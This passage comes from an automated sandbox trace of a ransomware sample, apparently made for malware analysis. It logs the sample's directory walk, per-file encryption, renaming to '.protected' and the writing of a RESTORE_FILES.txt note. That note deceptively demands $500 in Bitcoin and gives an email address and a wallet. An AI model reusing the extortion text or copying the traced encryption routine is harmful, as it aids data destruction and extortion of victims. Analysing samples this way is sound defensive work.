dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.899] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.899] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.899] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\..") returned 60 [0094.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.899] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.899] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.899] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.900] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.900] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.900] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 75 [0094.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.900] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.901] lstrlenA (lpString="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") returned 684 [0094.901] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.902] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.902] CloseHandle (hObject=0x14c) returned 1 [0094.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.902] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.902] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 71 [0094.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.902] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.902] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.903] lstrlenA (lpString="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") returned 684 [0094.904] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.904] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.904] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.904] CloseHandle (hObject=0xd8) returned 1 [0094.904] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0094.904] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 64 [0094.904] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0094.904] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0094.904] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 66 [0094.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.904] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.") returned 66 [0094.905] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0094.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.905] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\..") returned 67 [0094.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Windows") returned -1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files (x86)") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="$Recycle.bin") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="System Volume Information") returned -1 [0094.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 77 [0094.905] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0094.905] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0094.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 79 [0094.905] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.916] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.") returned 79 [0094.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.916] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.916] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.916] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.916] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\..") returned 80 [0094.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.916] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.916] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.917] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0094.917] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.917] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0094.917] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.918] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0094.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0094.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0094.918] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x92, lpOverlapped=0x0) returned 1 [0094.919] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.919] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x92, lpOverlapped=0x0) returned 1 [0094.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.921] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.922] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.922] CloseHandle (hObject=0x150) returned 1 [0094.922] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" 
| out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected") returned 99 [0094.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.protected")) returned 1 [0094.923] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Windows") returned -1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files (x86)") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="System Volume Information") returned -1 [0094.923] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.923] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch=".protected") returned 0x0 [0094.923] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.923] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.923] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.924] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".rar") returned 0x0 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".zip") returned 0x0 [0094.924] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0094.926] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0094.926] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.926] CloseHandle (hObject=0x150) returned 1 [0094.926] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected") returned 105 [0094.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.protected")) returned 1 [0094.927] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Windows") returned -1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files (x86)") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="$Recycle.bin") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="System Volume Information") returned 1 [0094.928] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 89 [0094.928] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 
[0094.928] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0094.928] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 91 [0094.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0094.929] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.929] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.929] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.") returned 91 [0094.929] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.929] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.929] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.929] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.929] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." 
